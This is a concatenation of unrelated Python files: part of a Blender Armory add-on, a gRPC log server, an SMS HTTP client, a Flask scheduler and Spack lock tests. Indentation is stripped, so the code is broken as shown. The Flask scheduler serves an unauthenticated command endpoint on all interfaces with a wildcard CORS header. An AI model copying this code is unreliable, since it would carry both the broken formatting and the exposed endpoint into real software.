properties_data_mesh.DATA_PT_uv_texture.COMPAT_ENGINES.add('ARMORY')
properties_data_mesh.DATA_PT_vertex_colors.COMPAT_ENGINES.add('ARMORY')
properties_data_mesh.DATA_PT_customdata.COMPAT_ENGINES.add('ARMORY')
properties_data_mesh.DATA_PT_custom_props_mesh.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_data_metaball
properties_data_metaball.DATA_PT_mball_texture_space.COMPAT_ENGINES.add('ARMORY')
properties_data_metaball.DATA_PT_custom_props_metaball.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_data_speaker
properties_data_speaker.DATA_PT_context_speaker.COMPAT_ENGINES.add('ARMORY')
properties_data_speaker.DATA_PT_speaker.COMPAT_ENGINES.add('ARMORY')
properties_data_speaker.DATA_PT_distance.COMPAT_ENGINES.add('ARMORY')
properties_data_speaker.DATA_PT_cone.COMPAT_ENGINES.add('ARMORY')
properties_data_speaker.DATA_PT_custom_props_speaker.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_physics_cloth
properties_physics_cloth.PHYSICS_PT_cloth.COMPAT_ENGINES.add('ARMORY')
properties_physics_cloth.PHYSICS_PT_cloth_cache.COMPAT_ENGINES.add('ARMORY')
properties_physics_cloth.PHYSICS_PT_cloth_collision.COMPAT_ENGINES.add('ARMORY')
properties_physics_cloth.PHYSICS_PT_cloth_stiffness.COMPAT_ENGINES.add('ARMORY')
properties_physics_cloth.PHYSICS_PT_cloth_sewing.COMPAT_ENGINES.add('ARMORY')
properties_physics_cloth.PHYSICS_PT_cloth_field_weights.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_physics_common
properties_physics_common.PHYSICS_PT_add.COMPAT_ENGINES.add('ARMORY')
properties_physics_common.PHYSICS_PT_add.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_physics_softbody
properties_physics_softbody.PHYSICS_PT_softbody.COMPAT_ENGINES.add('ARMORY')
properties_physics_softbody.PHYSICS_PT_softbody_cache.COMPAT_ENGINES.add('ARMORY')
properties_physics_softbody.PHYSICS_PT_softbody_goal.COMPAT_ENGINES.add('ARMORY')
properties_physics_softbody.PHYSICS_PT_softbody_edge.COMPAT_ENGINES.add('ARMORY')
properties_physics_softbody.PHYSICS_PT_softbody_collision.COMPAT_ENGINES.add('ARMORY')
properties_physics_softbody.PHYSICS_PT_softbody_solver.COMPAT_ENGINES.add('ARMORY')
properties_physics_softbody.PHYSICS_PT_softbody_field_weights.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_physics_rigidbody
properties_physics_rigidbody.PHYSICS_PT_rigid_body.COMPAT_ENGINES.add('ARMORY')
properties_physics_rigidbody.PHYSICS_PT_rigid_body_collisions.COMPAT_ENGINES.add('ARMORY')
properties_physics_rigidbody.PHYSICS_PT_rigid_body_dynamics.COMPAT_ENGINES.add('ARMORY')
properties_physics_rigidbody.PHYSICS_PT_rigid_body_dynamics.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_physics_rigidbody_constraint
properties_physics_rigidbody_constraint.PHYSICS_PT_rigid_body_constraint.COMPAT_ENGINES.add('ARMORY')
sdk_path = get_sdk_path(context)
if sdk_path == "":
print("Configure Armory SDK path first")
return {"CANCELLED"}
scripts_path = sdk_path + "/armory/blender/"
sys.path.append(scripts_path)
local_sdk = os.path.exists(get_fp() + '/armsdk')
import start
start.register(local_sdk=local_sdk)
ArmAddonStartButton.running = True
return {"FINISHED"}
class ArmAddonStopButton(bpy.types.Operator):
'''Stop Armory integration'''
bl_idname = "arm_addon.stop"
bl_label = "Stop"
def execute(self, context):
import start
start.unregister()
ArmAddonStartButton.running = False
return {"FINISHED"}
class ArmAddonUpdateButton(bpy.types.Operator):
'''Update Armory SDK'''
bl_idname = "arm_addon.update"
bl_label = "Update SDK"
bl_description = "Update to the latest development version"
def execute(self, context):
p = get_sdk_path(context)
if p == "":
self.report({"ERROR"}, "Configure Armory SDK path first")
return {"CANCELLED"}
self.report({'INFO'}, 'Updating, check console for details. Please restart Blender after successful SDK update.')
print('Armory (add-on v' + str(bl_info['version']) + '): Cloning [armory, iron, haxebullet, haxerecast, zui] repositories')
os.chdir(p)
global repos_updated
global repos_total
repos_updated = 0
repos_total = 7
def done():
global repos_updated
global repos_total
repos_updated += 1
if repos_updated == repos_total:
print('Armory SDK updated, please restart Blender')
update_repo(done, p, 'armory')
update_repo(done, p, 'iron')
update_repo(done, p, 'lib/haxebullet', 'haxebullet')
update_repo(done, p, 'lib/haxerecast', 'haxerecast')
update_repo(done, p, 'lib/zui', 'zui')
update_repo(done, p, 'lib/armory_tools', 'armory_tools')
update_repo(done, p, 'lib/iron_format', 'iron_format')
# update_repo(done, p, 'Kha', recursive=True)
# update_repo(done, p, 'Krom', 'Krom_bin')
return {"FINISHED"}
class ArmAddonRestoreButton(bpy.types.Operator):
'''Update Armory SDK'''
bl_idname = "arm_addon.restore"
bl_label = "Restore SDK"
bl_description = "Restore stable version"
def execute(self, context):
p = get_sdk_path(context)
if p == "":
self.report({"ERROR"}, "Configure Armory SDK path first")
return {"CANCELLED"}
os.chdir(p)
restore_repo(p, 'armory')
restore_repo(p, 'iron')
restore_repo(p, 'lib/haxebullet')
restore_repo(p, 'lib/haxerecast')
restore_repo(p, 'lib/zui')
restore_repo(p, 'lib/armory_tools')
restore_repo(p, 'lib/iron_format')
# restore_repo(p, 'Kha')
# restore_repo(p, 'Krom')
self.report({'INFO'}, 'Restored stable version')
return {"FINISHED"}
class ArmAddonInstallGitButton(bpy.types.Operator):
'''Install Git'''
bl_idname = "arm_addon.install_git"
bl_label = "Install Git"
bl_description = "Git is required for Armory Updater to work"
def execute(self, context):
webbrowser.open('https://git-scm.com')
return {"FINISHED"}
@persistent
def on_load_post(context):
# Detect local armsdk
# if os.path.exists(get_fp() + '/armsdk'):
# if ArmAddonStartButton.running:
# bpy.ops.arm_addon.stop()
if ArmAddonStartButton.running:
return
bpy.ops.arm_addon.start()
def register():
bpy.utils.register_class(ArmoryAddonPreferences)
bpy.utils.register_class(ArmAddonStartButton)
bpy.utils.register_class(ArmAddonStopButton)
bpy.utils.register_class(ArmAddonUpdateButton)
bpy.utils.register_class(ArmAddonRestoreButton)
bpy.utils.register_class(ArmAddonInstallGitButton)
bpy.app.handlers.load_post.append(on_load_post)
def unregister():
bpy.ops.arm_addon.stop()
bpy.utils.unregister_class(ArmoryAddonPreferences)
bpy.utils.unregister_class(ArmAddonStartButton)
bpy.utils.unregister_class(ArmAddonStopButton)
bpy.utils.unregister_class(ArmAddonUpdateButton)
bpy.utils.unregister_class(ArmAddonRestoreButton)
bpy.utils.unregister_class(ArmAddonInstallGitButton)
bpy.app.handlers.load_post.remove(on_load_post)
if __name__ == "__main__":
register()
|
interface.py
|
"""
===========================================================================
MIT License
Copyright (c) 2021 Manish Meganathan, Mariyam A.Ghani
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
===========================================================================
FyrMesh FyrLINK server
===========================================================================
"""
import os
import sys
import json
import grpc
import time
import threading
import concurrent.futures as futures
import proto.fyrmesh_pb2 as fyrmesh_pb2
import proto.fyrmesh_pb2_grpc as fyrmesh_pb2_grpc
from fyrlink.parsers import logtime
from fyrlink.workers import commandqueue, logqueue, loglock
from fyrlink.workers import reader, writer, logger, readfromqueue
from fyrlink.workers import KillableThread
# Create lock synchronisation object
threadlock = threading.Lock()
class Interface(fyrmesh_pb2_grpc.InterfaceServicer):
""" Class that implements the Interface gRPC Server """
def Read(self, request, context):
""" A method that implements the 'Read' runtime of the Interface
server. Collects log messages from the read queue and streams them
to the gRPC Interface client. """
if request.triggermessage == "start-stream-read":
with loglock:
while True:
message = readfromqueue(logqueue)
if message:
yield fyrmesh_pb2.ComplexLog(
logsource=message['source'],
logtype=message['type'],
logtime=message['time'],
logmessage=message['log'],
logmetadata=message['metadata']
)
else:
pass
else:
while True:
time.sleep(2)
yield fyrmesh_pb2.Complexlog(
logsource="LINK",
logtype="protolog",
logtime=logtime(),
logmessage="(error) invalid read stream initiation code",
logmetadata={
"server": "LINK",
"service": "Read",
"error": "nil"
})
def Write(self, request, context):
""" A method that implements the 'Write' runtime of the Interface
server. Puts the command recieved into the write queue with the
appropriate structure. """
command = request.command
metadata = request.metadata
try:
commandqueue.put({"type": "controlcommand", "command": command, **metadata})
logqueue.put({
"source": "LINK", "type": "protolog", "time": logtime(),
"log": f"(success) command '{command}' written to control node successfully",
"metadata": {
"server": "LINK",
"service": "Write",
"error": "nil"
}})
except Exception as e:
logqueue.put({
"source": "LINK", "type": "protolog", "time": logtime(),
"log": f"(failure) command '{command}' failed to be written to control node.",
"metadata": {
"server": "LINK",
"service": "Write",
"error": str(e)
}})
return fyrmesh_pb2.Acknowledge(success=False, error=str(e))
return fyrmesh_pb2.Acknowledge(success=True, error="nil")
def grpc_serve():
""" A function that sets up and serves the gRPC LINK Interface Server """
# Create a gRPC server object
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
# Register the server as an Interface server
fyrmesh_pb2_grpc.add_InterfaceServicer_to_server(Interface(), server)
# Retrieve the FYRMESHCONFIG env var
configpath = os.environ.get("FYRMESHCONFIG")
if not configpath:
logqueue.put({
"source": "LINK",
"type": "serverlog",
"time": logtime(),
"log": "(error) could not read config. 'FYRMESHCONFIG' env variable is not set",
"metadata": {}
})
sys.exit()
# Read the config file
configfilepath = os.path.join(configpath, "config.json")
with open(configfilepath) as configfile:
configdata = json.load(configfile)
# Setup the server listening port and start it.
port = configdata['services']['LINK']['port']
server.add_insecure_port(f'[::]:{port}')
server.start()
# Log the start of the server.
logqueue.put({
"source": "LINK",
"type": "serverlog",
"time": logtime(),
"log": "(startup) interface link grpc server started on http://localhost:50000",
"metadata": {}
})
# Server will wait indefinitely for termination
server.wait_for_termination()
if __name__ == "__main__":
# Define the IO thread workers that run concurrently
readerthread = KillableThread(name="reader", target=reader, daemon=True)
writerthread = KillableThread(name="writer", target=writer, daemon=True)
#loggerthread = KillableThread(name="logger", target=logger, daemon=True)
# Start the IO thread workers
readerthread.start()
writerthread.start()
#loggerthread.start()
try:
# Start the gRPC server
grpc_serve()
except KeyboardInterrupt:
# Kill the IO thread workers
readerthread.kill()
writerthread.kill()
#loggerthread.kill()
# Exit without handling regular exit runtimes such as printing tracebacks
os._exit(1)
|
__init__.py
|
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
import urllib, urllib2
import random, cgi
from threading import Thread
from SocketServer import ThreadingMixIn
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
class Client(object):
PROTOCOL_VERSION = "SPOMSKY/0.91"
class Server(ThreadingMixIn, HTTPServer):
pass
class RequestHandler(BaseHTTPRequestHandler):
def do_POST(self):
# parse the form data (what
# the hell *is* this junk?)
form = cgi.FieldStorage(
fp = self.rfile,
headers = self.headers,
environ = {
"REQUEST_METHOD": "POST",
"CONTENT_TYPE": self.headers["content-type"] })
# if a callback has been registered (via
# Client#subscribe), call it along with
# the source (phone number), and contents
if hasattr(self.server.spomsky_client, "callback"):
self.server.spomsky_client.callback(
form["source"].value, form["body"].value)
# always respond positively
self.send_response(200)
self.end_headers()
# Does nothing except prevent HTTP
# requests being echoed to the screen
def log_request(*args):
pass
def __init__(self, server_host="localhost", server_port=8100, client_host="localhost", client_port=None):
# copy the arguments into
# their attrs unchecked (!!)
self.server_host = server_host
self.server_port = int(server_port)
self.client_host = client_host
# initialize attributes
self.subscription_id = None
self.server = None
# if no client port was provided, randomly pick a
# high one. this is a bad idea, since it can fail.
# TODO: check that the port is available!
self.client_port = int(client_port) if client_port else random.randrange(10000, 11000)
def __url(self, path):
return "http://%s:%d/%s" % (self.server_host, self.server_port, path)
def send(self, destination, body):
# build the POST form
data = urllib.urlencode({
"version": self.PROTOCOL_VERSION,
"destination": destination,
"body": body
})
try:
# attempt to POST to spomskyd
f = urllib2.urlopen(self.__url("send"), data)
# read the response, even though we
# don't care what it contains (for now)
str = f.read()
f.close()
# urllib2 raises an exception on failure; we
# don't want to blow up the whole process,
# so just return false instead
except:
return False
# nothing went bang
return True
def subscribe(self, callback):
# if we are already
# subscribed, abort
if self.server:
return False
# note down the callback, to be called
# when a message arrives from the server
self.callback = callback
# create an HTTP server (to listen for callbacks from
# the spomsky server, to notify us of incoming SMS)
self.server = self.Server(("", self.client_port), self.RequestHandler)
self.server.spomsky_client = self
# start the server in a separate thread, and daemonize it
# to prevent it from hanging once the main thread terminates
self.thread = Thread(target=self.server.serve_forever)
self.thread.daemon = True
self.thread.start()
# build the POST form
data = urllib.urlencode({
"version": self.PROTOCOL_VERSION,
"host": self.client_host,
"port": self.client_port,
"path": "receiver"
})
try:
# post the request to spomskyd, and fetch the response
f = urllib2.urlopen(self.__url("receive/subscribe"), data)
str = f.read()
f.close()
# the subscription was successful, so store the uuid,
# and return true to indicate that we're subscribed
self.subscription_id = f.info()["x-subscription-uuid"]
return True
# something went wrong, so reset the
# subscription id and return false
except:
self.subscription_id = None
return False
def unsubscribe(self):
# if we are subscribed, then send an HTTP
# POST request to spomskyd to instruct it
# to stop sending us messages
if self.subscription_id:
# build the POST form
data = urllib.urlencode({
"version": self.PROTOCOL_VERSION,
"uuid": self.subscription_id
})
try:
# post the request to spomskyd, and fetch the response
f = urllib2.urlopen(self.__url("receive/unsubscribe"), data)
str = f.read()
f.close()
# request failed? no big deal, we've
# probably already been unsubscribed
except:
pass
# unset instance vars
self.callback = None
self.server = None
self.thread = None
# what could possibly
# have gone wrong?
return True
|
ThreadImpl.py
|
import threading
import thread
class ThreadImpl:
def __init__(self, threadId, taskName):
self.threadId = threadId
self.taskName = taskName
def execute(self):
print(self.threadId, self.taskName)
threadImpl = ThreadImpl("1", "Task 1")
#t = threading.Thread(target=threadImpl.execute)
#t.start()
|
main.py
|
"""Main loop for scheduler subsystem."""
from shared import config
from shared.controller import Controller
from scheduler.scheduler import Scheduler
from flask import Flask, request, jsonify
from flask_htpasswd import HtPasswdAuth
from flask_cors import CORS
import threading
from shared.streamtologger import StreamToLogger
import logging
import sys
logging.basicConfig(
filename=config.LOG_DIR + "scheduler.log",
# encoding='utf-8',
filemode='a', format='%(asctime)s %(levelname)s:%(message)s',
level=config.LOG_LEVEL)
logger = logging.getLogger("scheduler")
logger.setLevel(config.LOG_LEVEL)
werklog = logging.getLogger('werkzeug')
werklog.setLevel(logging.ERROR)
# redirect stdout and stderr to log file - do this before production
sys.stdout = StreamToLogger(logger,logging.INFO)
sys.stderr = StreamToLogger(logger,logging.ERROR)
def init_controller_obj():
# let's get this party started
controller_obj = Scheduler()
return controller_obj
def program_loop(controller_obj):
try:
controller_obj.start()
except KeyboardInterrupt:
logging.info(f"{whoami} interrupted.")
controller_obj.stop()
except:
logging.exception('Got exception on main handler')
raise
whoami = "scheduler"
controller_obj = init_controller_obj()
# threaded program_loop(controller_obj)
#
thread_obj = threading.Thread(target=program_loop, args=(controller_obj,), daemon=False)
thread_obj.start()
# Flask controller
#
# Create the server object
app = Flask(__name__, static_url_path="")
#
# Configure basic auth with htpasswd file
# app.config['FLASK_HTPASSWD_PATH'] = config.HTPASSWD_FILE
# app.config['FLASK_SECRET'] = 'SECRETSECRETSECRET'
# app.config['FLASK_AUTH_ALL']=True
# htpasswd = HtPasswdAuth(app)
#
# Serve CORS header
domain_list = []
for host in config.CONTROLLERS.values():
domain_list.append("http://" + host["server"] + ':' + str(host["port"]))
domain_list.append("http://" + host["altserv"] + ':' + str(host["port"]))
cors = CORS(app,
# supports_credentials=True,
origins=domain_list)
@app.route("/cmd",methods = ['POST', 'GET'])
def cmd():
if request.method == 'GET':
order_obj = request.args.to_dict(flat=True)
else:
order_obj = request.get_json(force=True)
response = jsonify(controller_obj.act_on_order(order_obj))
response.headers.add('Access-Control-Allow-Origin', '*')
return response
app.run(host="0.0.0.0", port=config.CONTROLLERS[whoami]["port"],
debug=config.DEBUG,use_reloader=False)
|
lrp_indicator.py
|
####################################################################
# ### lrp_indicator.py ###
####################################################################
# ### Author: SAS Institute Inc. ###
####################################################################
# ###
# Copyright (c) 2020, SAS Institute Inc., Cary, NC, USA. ###
# All Rights Reserved. ###
# SPDX-License-Identifier: Apache-2.0 ###
# ###
####################################################################
import sys
import threading
import time
from typing import Optional, Text
class LRPIndicator:
"""
Custom context manager used to indicate that a long-running process is currently executing. An :code:`enter_message`
can be displayed when entering the context manager. While running, a progression of the given :code:`character` will
display to stdout up to the given :code:`line_length`. Once the :code:`line_length` is reached, the progression of
:code:`characters` will be removed and the progression will start again from the end of the :code:`enter_message`.
Upon exit, the line will be filled with the given :code:`character` up to the given :code:`line_length` and a
configurable :code:`exit_message` will be displayed.
"""
def __init__(self, enter_message: Text, character: Text = ".", delay: float = 0.9, line_length: int = 50):
"""
Constructs a new :code:`LRPIndicator` instance.
:param enter_message: The message to display when entering the context manager.
:param character: The character to use in the indicator progression.
:param delay: The delay between printing each character in the progression.
:param line_length: The total length of the indicator line (i.e. message + character progression).
"""
# indicator attributes
self._indicator_char: Text = character
self._indicator_delay: float = delay
self._indicator_count: int = 0
# minimum indicator length is 3 chars
if len(enter_message) < (line_length - 2):
self._indicator_total = line_length - len(enter_message)
# line attributes
self._line_length: int = line_length
# status
self._process_running: bool = False
# thread
self._screen_lock: Optional[threading.Lock] = None
self._thread: Optional[threading.Thread] = None
# messages
self._enter_message: Text = enter_message
# exit message can be set before context exits
self.exit_message: Text = "DONE"
def __enter__(self):
"""
Sets up the thread for running the indicator and displays the :code:`enter_message`.
:return: This LRPIndicator instance.
"""
if sys.stdout.isatty():
# hide the cursor
sys.stdout.write("\033[?25l")
# print the enter message
sys.stdout.write(self._enter_message)
sys.stdout.flush()
# start the thread
self._screen_lock = threading.Lock()
self._process_running = True
self._thread = threading.Thread(target=self._indicator_target)
self._thread.start()
else:
sys.stdout.write(self._enter_message.ljust(self._line_length, self._indicator_char))
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""
Closes the indicator context and displays the configured :code:`exit_message`.
:param exc_type: The exception type if an error was raised while executing the code block.
:param exc_val: The exception value if an error was raised while executing the code block.
:param exc_tb: The traceback if an error was raised while executing the code block.
"""
if sys.stdout.isatty():
self._process_running = False
sys.stdout.write(f"\r{self._enter_message.ljust(self._line_length, self._indicator_char)}")
# print exit message and move to next line
sys.stdout.write(f"{self.exit_message}\n")
# show the cursor again
sys.stdout.write("\033[?25h")
sys.stdout.flush()
def _indicator_target(self):
"""
Target method for the indicator thread.
"""
while self._process_running:
# if the indicator total hasn't been reached, print another
if self._indicator_count < self._indicator_total:
sys.stdout.write(self._indicator_char)
self._indicator_count += 1
else:
sys.stdout.write("\r")
sys.stdout.write(" " * self._line_length)
sys.stdout.write(f"\r{self._enter_message}")
self._indicator_count = 0
sys.stdout.flush()
time.sleep(self._indicator_delay)
|
lock.py
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""These tests ensure that our lock works correctly.
This can be run in two ways.
First, it can be run as a node-local test, with a typical invocation like
this::
spack test lock
You can *also* run it as an MPI program, which allows you to test locks
across nodes. So, e.g., you can run the test like this::
mpirun -n 7 spack test lock
And it will test locking correctness among MPI processes. Ideally, you
want the MPI processes to span across multiple nodes, so, e.g., for SLURM
you might do this::
srun -N 7 -n 7 -m cyclic spack test lock
You can use this to test whether your shared filesystem properly supports
POSIX reader-writer locking with byte ranges through fcntl.
If you want to test on multiple filesystems, you can modify the
``locations`` list below. By default it looks like this::
locations = [
tempfile.gettempdir(), # standard tmp directory (potentially local)
'/nfs/tmp2/%u', # NFS tmp mount
'/p/lscratch*/%u' # Lustre scratch mount
]
Add names and paths for your preferred filesystem mounts to test on them;
the tests are parametrized to run on all the filesystems listed in this
dict. Note that 'tmp' will be skipped for MPI testing, as it is often a
node-local filesystem, and multi-node tests will fail if the locks aren't
actually on a shared filesystem.
"""
import collections
import errno
import fcntl
import os
import socket
import shutil
import tempfile
import traceback
import glob
import getpass
from contextlib import contextmanager
from multiprocessing import Process, Queue
import pytest
import llnl.util.lock as lk
import llnl.util.multiproc as mp
from llnl.util.filesystem import touch
#
# This test can be run with MPI. MPI is "enabled" if we can import
# mpi4py and the number of total MPI processes is greater than 1.
# Otherwise it just runs as a node-local test.
#
# NOTE: MPI mode is different from node-local mode in that node-local
# mode will spawn its own test processes, while MPI mode assumes you've
# run this script as a SPMD application. In MPI mode, no additional
# processes are spawned, and you need to ensure that you mpirun the
# script with enough processes for all the multiproc_test cases below.
#
# If you don't run with enough processes, tests that require more
# processes than you currently have will be skipped.
#
mpi = False
comm = None
try:
from mpi4py import MPI
comm = MPI.COMM_WORLD
if comm.size > 1:
mpi = True
except ImportError:
pass
"""This is a list of filesystem locations to test locks in. Paths are
expanded so that %u is replaced with the current username. '~' is also
legal and will be expanded to the user's home directory.
Tests are skipped for directories that don't exist, so you'll need to
update this with the locations of NFS, Lustre, and other mounts on your
system.
"""
locations = [
tempfile.gettempdir(),
os.path.join('/nfs/tmp2/', getpass.getuser()),
os.path.join('/p/lscratch*/', getpass.getuser()),
]
"""This is the longest a failed multiproc test will take.
Barriers will time out and raise an exception after this interval.
In MPI mode, barriers don't time out (they hang). See mpi_multiproc_test.
"""
barrier_timeout = 5
"""This is the lock timeout for expected failures.
This may need to be higher for some filesystems."""
lock_fail_timeout = 0.1
def make_readable(*paths):
for path in paths:
mode = 0o555 if os.path.isdir(path) else 0o444
os.chmod(path, mode)
def make_writable(*paths):
for path in paths:
mode = 0o755 if os.path.isdir(path) else 0o744
os.chmod(path, mode)
@contextmanager
def read_only(*paths):
modes = [os.stat(p).st_mode for p in paths]
make_readable(*paths)
yield
for path, mode in zip(paths, modes):
os.chmod(path, mode)
@pytest.fixture(scope='session', params=locations)
def lock_test_directory(request):
"""This fixture causes tests to be executed for many different mounts.
See the ``locations`` dict above for details.
"""
return request.param
@pytest.fixture(scope='session')
def lock_dir(lock_test_directory):
parent = next((p for p in glob.glob(lock_test_directory)
if os.path.exists(p) and os.access(p, os.W_OK)), None)
if not parent:
# Skip filesystems that don't exist or aren't writable
pytest.skip("requires filesystem: '%s'" % lock_test_directory)
elif mpi and parent == tempfile.gettempdir():
# Skip local tmp test for MPI runs
pytest.skip("skipping local tmp directory for MPI test.")
tempdir = None
if not mpi or comm.rank == 0:
tempdir = tempfile.mkdtemp(dir=parent)
if mpi:
tempdir = comm.bcast(tempdir)
yield tempdir
if mpi:
# rank 0 may get here before others, in which case it'll try to
# remove the directory while other processes try to re-create the
# lock. This will give errno 39: directory not empty. Use a
# barrier to ensure everyone is done first.
comm.barrier()
if not mpi or comm.rank == 0:
make_writable(tempdir)
shutil.rmtree(tempdir)
@pytest.fixture
def private_lock_path(lock_dir):
"""In MPI mode, this is a private lock for each rank in a multiproc test.
For other modes, it is the same as a shared lock.
"""
lock_file = os.path.join(lock_dir, 'lockfile')
if mpi:
lock_file += '.%s' % comm.rank
yield lock_file
if os.path.exists(lock_file):
make_writable(lock_dir, lock_file)
os.unlink(lock_file)
@pytest.fixture
def lock_path(lock_dir):
"""This lock is shared among all processes in a multiproc test."""
lock_file = os.path.join(lock_dir, 'lockfile')
yield lock_file
if os.path.exists(lock_file):
make_writable(lock_dir, lock_file)
os.unlink(lock_file)
def test_poll_interval_generator():
interval_iter = iter(
lk.Lock._poll_interval_generator(_wait_times=[1, 2, 3]))
intervals = list(next(interval_iter) for i in range(100))
assert intervals == [1] * 20 + [2] * 40 + [3] * 40
def local_multiproc_test(*functions, **kwargs):
"""Order some processes using simple barrier synchronization."""
b = mp.Barrier(len(functions), timeout=barrier_timeout)
args = (b,) + tuple(kwargs.get('extra_args', ()))
procs = [Process(target=f, args=args, name=f.__name__)
for f in functions]
for p in procs:
p.start()
for p in procs:
p.join()
assert all(p.exitcode == 0 for p in procs)
def mpi_multiproc_test(*functions):
"""SPMD version of multiproc test.
This needs to be run like so:
srun spack test lock
Each process executes its corresponding function. This is different
from ``multiproc_test`` above, which spawns the processes. This will
skip tests if there are too few processes to run them.
"""
procs = len(functions)
if procs > comm.size:
pytest.skip("requires at least %d MPI processes" % procs)
comm.Barrier() # barrier before each MPI test
include = comm.rank < len(functions)
subcomm = comm.Split(include)
class subcomm_barrier(object):
"""Stand-in for multiproc barrier for MPI-parallel jobs."""
def wait(self):
subcomm.Barrier()
if include:
try:
functions[subcomm.rank](subcomm_barrier())
except BaseException:
# aborting is the best we can do for MPI tests without
# hanging, since we're using MPI barriers. This will fail
# early and it loses the nice pytest output, but at least it
# gets use a stacktrace on the processes that failed.
traceback.print_exc()
comm.Abort()
subcomm.Free()
comm.Barrier() # barrier after each MPI test.
"""``multiproc_test()`` should be called by tests below.
``multiproc_test()`` will work for either MPI runs or for local runs.
"""
multiproc_test = mpi_multiproc_test if mpi else local_multiproc_test
#
# Process snippets below can be composed into tests.
#
class AcquireWrite(object):
def __init__(self, lock_path, start=0, length=0):
self.lock_path = lock_path
self.start = start
self.length = length
@property
def __name__(self):
return self.__class__.__name__
def __call__(self, barrier):
lock = lk.Lock(self.lock_path, self.start, self.length)
lock.acquire_write() # grab exclusive lock
barrier.wait()
barrier.wait() # hold the lock until timeout in other procs.
class AcquireRead(object):
def __init__(self, lock_path, start=0, length=0):
self.lock_path = lock_path
self.start = start
self.length = length
@property
def __name__(self):
return self.__class__.__name__
def __call__(self, barrier):
lock = lk.Lock(self.lock_path, self.start, self.length)
lock.acquire_read() # grab shared lock
barrier.wait()
barrier.wait() # hold the lock until timeout in other procs.
class TimeoutWrite(object):
def __init__(self, lock_path, start=0, length=0):
self.lock_path = lock_path
self.start = start
self.length = length
@property
def __name__(self):
return self.__class__.__name__
def __call__(self, barrier):
lock = lk.Lock(self.lock_path, self.start, self.length)
barrier.wait() # wait for lock acquire in first process
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
barrier.wait()
class TimeoutRead(object):
def __init__(self, lock_path, start=0, length=0):
self.lock_path = lock_path
self.start = start
self.length = length
@property
def __name__(self):
return self.__class__.__name__
def __call__(self, barrier):
lock = lk.Lock(self.lock_path, self.start, self.length)
barrier.wait() # wait for lock acquire in first process
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait()
#
# Test that exclusive locks on other processes time out when an
# exclusive lock is held.
#
def test_write_lock_timeout_on_write(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_write_2(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_write_3(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_write_ranges(lock_path):
multiproc_test(
AcquireWrite(lock_path, 0, 1),
TimeoutWrite(lock_path, 0, 1))
def test_write_lock_timeout_on_write_ranges_2(lock_path):
multiproc_test(
AcquireWrite(lock_path, 0, 64),
AcquireWrite(lock_path, 65, 1),
TimeoutWrite(lock_path, 0, 1),
TimeoutWrite(lock_path, 63, 1))
def test_write_lock_timeout_on_write_ranges_3(lock_path):
multiproc_test(
AcquireWrite(lock_path, 0, 1),
AcquireWrite(lock_path, 1, 1),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_write_ranges_4(lock_path):
multiproc_test(
AcquireWrite(lock_path, 0, 1),
AcquireWrite(lock_path, 1, 1),
AcquireWrite(lock_path, 2, 456),
AcquireWrite(lock_path, 500, 64),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
#
# Test that shared locks on other processes time out when an
# exclusive lock is held.
#
def test_read_lock_timeout_on_write(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutRead(lock_path))
def test_read_lock_timeout_on_write_2(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutRead(lock_path),
TimeoutRead(lock_path))
def test_read_lock_timeout_on_write_3(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutRead(lock_path),
TimeoutRead(lock_path),
TimeoutRead(lock_path))
def test_read_lock_timeout_on_write_ranges(lock_path):
"""small write lock, read whole file."""
multiproc_test(
AcquireWrite(lock_path, 0, 1),
TimeoutRead(lock_path))
def test_read_lock_timeout_on_write_ranges_2(lock_path):
"""small write lock, small read lock"""
multiproc_test(
AcquireWrite(lock_path, 0, 1),
TimeoutRead(lock_path, 0, 1))
def test_read_lock_timeout_on_write_ranges_3(lock_path):
"""two write locks, overlapping read locks"""
multiproc_test(
AcquireWrite(lock_path, 0, 1),
AcquireWrite(lock_path, 64, 128),
TimeoutRead(lock_path, 0, 1),
TimeoutRead(lock_path, 128, 256))
#
